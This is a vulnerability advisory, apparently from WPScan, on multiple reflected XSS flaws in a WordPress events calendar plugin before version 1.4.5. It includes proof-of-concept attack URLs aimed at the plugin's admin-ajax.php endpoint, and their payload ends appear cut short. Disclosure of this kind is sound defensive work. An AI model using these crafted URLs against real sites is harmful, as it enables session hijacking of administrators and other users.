WPVDB-ID: F1244C57-D886-4A6E-8CDB-18404E8C153C
History: Dec 20, 2022 - 12:00 a.m.

WordPress Events Calendar Plugin < 1.4.5 - Multiple Reflected XSS

2022-12-20 00:00:00
cydave
wpscan.com
6
Tags: wordpress events, calendar plugin, xss vulnerability

EPSS: 0.001 (Low), Percentile: 45.5%

The plugin does not sanitize and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against both unauthenticated and authenticated users (such as high-privilege ones like admin).

PoC

1. Create a new calendar in the plugin’s settings page (most payloads below require at least one calendar to exist).

Attack: Make any unauthenticated or authenticated user (such as an admin) open one of the URLs below:

1. https://example.com/wp-admin/admin-ajax.php?action=cdaily&subaction=cd_displayday&callback=1&bymethod=&by_id=/../../../../../../r%26_=-->
2. https://example.com/wp-admin/admin-ajax.php?action=cdaily&subaction=cd_calendar&id=XX">
3. https://example.com/wp-admin/admin-ajax.php?action=cdaily&subaction=cd_dismisshint&callback=

CPE Name | Operator | Version
connect-daily-web-calendar | lt | 1.4.5

